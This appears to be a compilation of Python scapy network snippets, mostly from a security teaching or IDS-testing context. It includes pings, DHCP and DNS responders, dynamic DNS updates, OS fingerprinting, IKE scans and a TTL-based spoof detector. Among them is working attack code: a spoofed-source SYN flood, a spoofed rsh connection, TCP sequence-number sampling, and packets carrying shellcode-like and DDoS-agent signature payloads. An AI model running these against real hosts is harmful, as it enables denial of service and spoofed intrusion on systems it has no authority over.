def exploit_test(src, dst, iface, count):
    """Send two fixed-payload UDP datagrams to *dst* (ports 518 and 635), *count* times each on *iface*.

    Both datagrams carry *src* as the IP source address and a hard-coded
    load; nothing is read back. The payload bytes are the ones literally
    given below and are not interpreted by this function.
    """
    pkt = IP(src=src, dst=dst) / UDP(dport=518) / \
        Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8")
    send(pkt, iface=iface, count=count)
    pkt = IP(src=src, dst=dst) / UDP(dport=635) \
        / Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F")
    send(pkt, iface=iface, count=count)
def spoof_conn(src, tgt, ack):
    """Send two TCP segments from *src*:513 to *tgt*:514, the second carrying *ack* as its acknowledgement number.

    Neither segment sets TCP flags explicitly, so both use scapy's TCP
    defaults; only the ack field differs between them. Packets are sent
    with ``send`` on the default interface and no reply is awaited.
    """
    ip_layer = IP(src=src, dst=tgt)
    tcp_layer = TCP(sport=513, dport=514)
    syn_pkt = ip_layer / tcp_layer
    send(syn_pkt)
    ip_layer = IP(src=src, dst=tgt)
    tcp_layer = TCP(sport=513, dport=514, ack=ack)
    ack_pkt = ip_layer / tcp_layer
    send(ack_pkt)
def ddos_test(src, dst, iface, count):
    """Send four fixed packets to *dst*, *count* times each on *iface*.

    In order: an ICMP echo request (id 678, payload '1234'), an ICMP echo
    reply with a ten-byte 'A' payload, a UDP datagram to port 31335 with
    payload 'PONG', and an ICMP echo request with id 456 and no payload.
    NOTE(review): these look like canned patterns meant to exercise IDS
    signatures for DDoS agents — confirm against the rule set they target.
    """
    pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='1234')
    send(pkt, iface=iface, count=count)
    pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')
    send(pkt, iface=iface, count=count)
    pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')
    send(pkt, iface=iface, count=count)
    pkt = IP(src=src, dst=dst) / ICMP(type=8, id=456)
    send(pkt, iface=iface, count=count)
def ping_pro(ip):
    """Send one ICMP echo request to *ip*, dump the request, and print whether a reply arrived.

    Prints ``'<responder> 通!'`` when a reply came back within two seconds
    and ``'<ip> 不通!'`` otherwise. Returns None.
    """
    echo = IP(dst=ip) / ICMP(type=8, code=0)  # one echo request
    reply = sr1(echo, timeout=2, verbose=False)  # first reply, or None after 2 s
    echo.show()  # dump the request that was sent, not the reply
    if not reply:
        print('%s 不通!' % ip)
        return
    print('%s 通!' % reply[IP].src)
def dhcp_request(iface=None, **kargs):
    """Broadcast a DHCP DISCOVER on *iface* and return the first reply seen by ``srp1``.

    The interface's raw hardware address is used as chaddr. When *iface* is
    None, ``conf.iface`` is used. Extra keyword arguments are forwarded to
    ``srp1``. Scapy's warning is emitted first when ``conf.checkIPaddr`` is
    non-zero.
    """
    if conf.checkIPaddr != 0:
        warning("conf.checkIPaddr is not 0, I may not be able to match the answer")
    if iface is None:
        iface = conf.iface
    chaddr = get_if_raw_hwaddr(iface)
    discover = (
        Ether(dst="ff:ff:ff:ff:ff:ff")
        / IP(src="0.0.0.0", dst="255.255.255.255")
        / UDP(sport=68, dport=67)
        / BOOTP(chaddr=chaddr)
        / DHCP(options=[("message-type", "discover"), "end"])
    )
    return srp1(discover, iface=iface, **kargs)
def qytang_ping(ip):
    """Send one ICMP echo request to *ip* and return ``(ip, 1)`` on a reply within 2 s, else ``(ip, 0)``."""
    reply = sr1(IP(dst=ip) / ICMP(), timeout=2, verbose=False)
    reachable = 1 if reply else 0
    return ip, reachable
def ping(self):
    """Send five echo requests built from ``self.ip``/``self.srcip``/``self.length`` and print '+' per reply, '?' per timeout.

    The packet is rebuilt and stored in ``self.pkt`` before the loop; each
    probe waits at most one second. A newline is printed at the end.
    """
    self.pkt = IP(dst=self.ip, src=self.srcip) / ICMP() / (b'v' * self.length)
    for _ in range(5):
        answered = sr1(self.pkt, timeout=1, verbose=False)
        print('+' if answered else '?', end='', flush=True)
    print()
def ping1(ipadd):
    """Send one ICMP echo request to *ipadd* and return the string '1' on a reply within 2 s, else '0'."""
    reply = sr1(IP(dst=ipadd) / ICMP(), timeout=2, verbose=False)
    return '1' if reply else '0'
def make_reply(self, req):
    """Build the DNS reply for the query packet *req*.

    The reply is addressed back to the sender by swapping the IP addresses
    and UDP ports of the request. The answer section holds one record for
    the queried name whose rdata comes from ``self.match`` (keyed on the
    raw qname), falling back to ``self.joker`` for names not in the table.
    Only the first question (``dns.qd``) is consulted.
    """
    ip = req.getlayer(IP)
    dns = req.getlayer(DNS)
    resp = IP(dst=ip.src, src=ip.dst) / UDP(dport=ip.sport, sport=ip.dport)
    # Lookup is by exact qname bytes; no case folding or trailing-dot handling is done here.
    rdata = self.match.get(dns.qd.qname, self.joker)
    resp /= DNS(id=dns.id, qr=1, qd=dns.qd, an=DNSRR(rrname=dns.qd.qname, ttl=10, rdata=rdata))
    return resp
def ping(self):
    """Send five echo requests built from ``self.ip``/``self.srcip``/``self.length`` and print '!' per reply, '.' per timeout.

    The packet is rebuilt here on every call so that a source address
    assigned after construction is used; the original author observed that
    without this line the packet kept the constructor's src of None. Each
    probe waits at most one second; a newline is printed at the end.
    """
    self.pkt = IP(dst=self.ip, src=self.srcip) / ICMP() / (b'v' * self.length)
    for _ in range(5):
        answered = sr1(self.pkt, timeout=1, verbose=False)
        print('!' if answered else '.', end='', flush=True)
    print()
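def check_TTL(ipsrc, ttl):
    """Flag a packet whose TTL disagrees with the TTL actually observed from its source.

    Private source addresses are ignored. The first time *ipsrc* is seen,
    one ICMP echo is sent to it and the reply's TTL is cached in the
    module-level ``ttl_values``; every call then compares *ttl* against that
    baseline and prints an alert when the difference exceeds the
    module-level ``THRESH``.

    Args:
        ipsrc: source address taken from the observed packet.
        ttl: TTL value carried by the observed packet.

    Returns:
        None; findings are reported by printing.
    """
    if IPTEST(ipsrc).iptype() == 'PRIVATE':
        return
    if ipsrc not in ttl_values:
        pkt = sr1(IP(dst=ipsrc) / ICMP(), retry=0, timeout=1, verbose=0)
        if pkt is None:
            # No echo reply within the timeout (original code raised
            # AttributeError here). Leave the cache untouched so a later
            # packet from this source retries the probe instead of
            # comparing against a bogus baseline.
            return
        ttl_values[ipsrc] = pkt.ttl
    if abs(int(ttl) - int(ttl_values[ipsrc])) > THRESH:
        print(f'\n[!] Detected Possible Spoofed Packet From: {ipsrc}')
        print(f'[!] TTL: {ttl}, Actual TTL: {ttl_values[ipsrc]}')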
def call_TSN(tgt):
    """Send four default TCP segments to *tgt* and print the change in sequence number between replies.

    Returns the last observed sequence number plus the last computed
    difference. ``pre_num`` starts at 0 and is only reassigned when it is
    already non-zero, so as written every difference is taken against 0.
    NOTE(review): ``sr1`` returns None when nothing answers within its
    default timeout, in which case ``ans.getlayer`` raises.
    """
    seq_num = 0
    pre_num = 0
    diff_seq = 0
    for x in range(1, 5):
        if pre_num:
            pre_num = seq_num
        pkt = IP(dst=tgt) / TCP()
        ans = sr1(pkt, verbose=0)
        seq_num = ans.getlayer(TCP).seq_num
        diff_seq = seq_num - pre_num
        print(f'[+] TCP Seq Difference: {str(diff_seq)}')
    return seq_num + diff_seq
def make_reply(self, req):
    """Build the BOOTP reply for request *req*.

    When ``self.pool`` is a list, each client MAC is handed one address
    popped from it and the assignment is remembered in ``self.leases``
    (``pop()`` raises IndexError once the pool is empty); otherwise
    ``self.pool`` is used as the single address for every client.
    ``self.gw`` is written into siaddr, ciaddr and giaddr. The reply is
    unicast to the requesting MAC with the request's UDP ports swapped.
    """
    mac = req.src
    if type(self.pool) is list:
        if not mac in self.leases:
            self.leases[mac] = self.pool.pop()
        ip = self.leases[mac]
    else:
        ip = self.pool
    repb = req.getlayer(BOOTP).copy()
    repb.op="BOOTREPLY"
    repb.yiaddr = ip
    repb.siaddr = self.gw
    repb.ciaddr = self.gw
    repb.giaddr = self.gw
    # Drop whatever followed the BOOTP layer in the request; the reply carries none of it.
    del(repb.payload)
    rep=Ether(dst=mac)/IP(dst=ip)/UDP(sport=req.dport,dport=req.sport)/repb
    return rep
def dyndns_del(nameserver, name, type="ALL", ttl=10):
    """Send an RFC 2136 dynamic-update DELETE for *name* to *nameserver*.

    The zone is everything after the first label of *name* (the whole name
    when it contains no dot). The update section carries one RR for *name*
    of the given *type* with class ANY, TTL 0 and empty rdata, which RFC
    2136 defines as "delete the RRset". *ttl* is accepted for interface
    compatibility only; a delete is always sent with TTL 0.

    Args:
        nameserver: address the update is sent to.
        name: owner name whose records are deleted.
        type: RR type to delete (default "ALL").
        ttl: unused.

    Returns:
        int: the DNS RCODE of the reply (0 = NOERROR), or -1 when no DNS
        reply arrived within 5 seconds.

    Example:
        dyndns_del("ns1.toto.com", "dyn.toto.com")
    """
    first_dot = name.find(".")
    zone = name[first_dot + 1:]
    delete_rr = DNSRR(rrname=name, type=type, rclass="ANY", ttl=0, rdata=b"")
    update = DNS(opcode=5, qd=[DNSQR(qname=zone, qtype="SOA")], ns=[delete_rr])  # opcode 5 = UPDATE
    reply = sr1(IP(dst=nameserver) / UDP() / update, verbose=0, timeout=5)
    if not (reply and reply.haslayer(DNS)):
        return -1
    return reply.getlayer(DNS).rcode
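def dyndns_add(nameserver, name, rdata, type="A", ttl=10):
    """Send an RFC 2136 dynamic-update ADD of one RR for *name* to *nameserver*.

    The zone is everything after the first label of *name* (the whole name
    when it contains no dot). One RR ``name type ttl rdata`` is placed in
    the update section.

    Args:
        nameserver: address the update is sent to.
        name: owner name of the new record.
        rdata: record data (e.g. an address string for type "A").
        type: RR type of the new record. Previously ignored — the record was
            always sent as type "A" regardless of this argument.
        ttl: TTL of the new record.

    Returns:
        int: the DNS RCODE of the reply (0 = NOERROR), or -1 when no DNS
        reply arrived within 5 seconds.

    Example:
        dyndns_add("ns1.toto.com", "dyn.toto.com", "127.0.0.1")
    """
    zone = name[name.find(".") + 1:]
    update = DNS(opcode=5,  # opcode 5 = UPDATE
                 qd=[DNSQR(qname=zone, qtype="SOA")],
                 # fixed: honour the `type` parameter instead of hard-coding "A"
                 ns=[DNSRR(rrname=name, type=type, ttl=ttl, rdata=rdata)])
    r = sr1(IP(dst=nameserver) / UDP() / update, verbose=0, timeout=5)
    if r and r.haslayer(DNS):
        return r.getlayer(DNS).rcode
    return -1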
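def queso_sig(target, dport=80, timeout=3):
    """Build a QueSO-style TCP response signature for *target*.

    Seven probes with different TCP flag combinations are sent to *dport*;
    each reply is summarised as ``"<seq!=0> <ack relation> <window hex> <flags hex>"``
    and a probe with no reply within *timeout* yields ``"- - - -"``.

    Args:
        target: destination address for the probes.
        dport: TCP destination port probed.
        timeout: seconds to wait for each probe's reply.

    Returns:
        list[str]: one signature string per probe, in probe order.
    """
    # The knowledge base is loaded as before; this function does not use the result.
    queso_kdb.get_base()
    ret = []
    for flags in ["S", "SA", "F", "FA", "SF", "P", "SEC"]:
        ans, _ = sr(IP(dst=target) / TCP(dport=dport, flags=flags, seq=RandInt()),
                    timeout=timeout, verbose=0)
        if len(ans) == 0:
            ret.append("- - - -")
            continue
        s, r = ans[0]
        rs = "%i" % (r.seq != 0)
        if not r.ack:
            rs += " 0"  # fixed: original appended to the packet `r` instead of the string `rs`
        elif r.ack - s.seq > 666:
            rs += " R"  # fixed: original `" R" % 0` raised TypeError (no format specifier)
        else:
            rs += " +%i" % (r.ack - s.seq)
        rs += " %X" % r.window
        rs += " %x" % r.payload.flags
        ret.append(rs)
    return ret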
def dup_IL(pkt):
    """Return a fresh IP header copying selected fields of *pkt*'s IP layer.

    Only version, id, tos, flags, ttl, proto, src, dst and options are
    carried over; header length, total length and checksum are not copied,
    and no payload is attached.
    """
    original = pkt.getlayer(IP)
    copied_fields = ("version", "id", "tos", "flags", "ttl",
                     "proto", "src", "dst", "options")
    return IP(**{field: getattr(original, field) for field in copied_fields})
def ikev2scan(ip):
    """Send one IKEv2 IKE_SA_INIT probe (exchange type 34) to *ip* and return ``sr``'s (answered, unanswered) pair."""
    sa_payload = IKEv2_payload_SA(prop=IKEv2_payload_Proposal())
    header = IKEv2(init_SPI=RandString(8), exch_type=34)  # random initiator SPI
    probe = IP(dst=ip) / UDP() / header / sa_payload
    return sr(probe)
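#
import logging

logging.getLogger("kamene.runtime").setLevel(logging.ERROR)  # silence non-essential runtime warnings
from kamene.all import *
from kamene.layers.inet import IP, ICMP

ping_pkt = IP(dst='192.168.157.129') / ICMP()  # build one ICMP echo request
ping_result = sr1(ping_pkt, timeout=2, verbose=False)  # send it; first reply or None after 2 s
# Original called .show() unconditionally and raised AttributeError on a timeout.
if ping_result is not None:
    ping_result.show()
#
#
#
import paramiko

ssh = paramiko.SSHClient()
ssh.load_system_host_keys()
# NOTE(review): AutoAddPolicy accepts any host key not already known, so the
# first connection to a host cannot detect a substituted server; outside a
# lab, pin the expected key or use paramiko.RejectPolicy.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# NOTE(review): credentials are hard-coded (masked in this copy); read them
# from the environment or use key-based auth rather than embedding them.
ssh.connect('192.168.157.129', port=22, username='******', password='******',
            timeout=5, compress=True)
try:
    stdin, stdout, stderr = ssh.exec_command('ls')
    x = stdout.read().decode()
finally:
    ssh.close()  # original never closed the session
print(x)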
def syn_flood(src, tgt):
    """Send one TCP segment to *tgt* port 513 from each source port 1024..65534, with *src* as the IP source.

    No TCP flags are set explicitly, so scapy's defaults apply. Segments
    are sent one at a time with ``send`` and no pacing or reply handling.
    """
    for sport in range(1024, 65535):
        ip_layer = IP(src=src, dst=tgt)
        tcp_layer = TCP(sport=sport, dport=513)
        pkt = ip_layer / tcp_layer
        send(pkt)
def __init__(self, ip):
    """Store the target *ip*, default to no source override and a 100-byte payload, and build the initial packet."""
    self.ip = ip
    self.srcip = None
    self.size = 100
    payload = b'v' * self.size
    self.pkt = IP(dst=self.ip, src=self.srcip) / ICMP() / payload
def size(self, size):
    """Set the payload size to *size* bytes and rebuild ``self.pkt`` with the current ip/srcip."""
    self.size = size
    payload = b'v' * self.size
    self.pkt = IP(dst=self.ip, src=self.srcip) / ICMP() / payload
def src(self, srcip):
    """Set the IP source address to *srcip* and rebuild ``self.pkt`` with the current ip/size."""
    self.srcip = srcip
    payload = b'v' * self.size
    self.pkt = IP(dst=self.ip, src=self.srcip) / ICMP() / payload
def ikescan(ip):
    """Send one ISAKMP (IKEv1) probe with exchange type 2 to *ip* and return ``sr``'s (answered, unanswered) pair."""
    sa_payload = ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal())
    header = ISAKMP(init_cookie=RandString(8), exch_type=2)  # random initiator cookie
    probe = IP(dst=ip) / UDP() / header / sa_payload
    return sr(probe)
def scan_test(src, dst, iface, count):
    """Send two fixed-payload UDP datagrams to *dst*: 'cybercop' to port 7 and 'Amanda' to port 10000.

    NOTE(review): only the second ``send`` uses *iface* and *count*; the
    first goes out once on the default interface — verify that asymmetry
    is intended.
    """
    pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')
    send(pkt)
    pkt = IP(src=src, dst=dst) / UDP(dport=10000) / Raw(load='Amanda')
    send(pkt, iface=iface, count=count)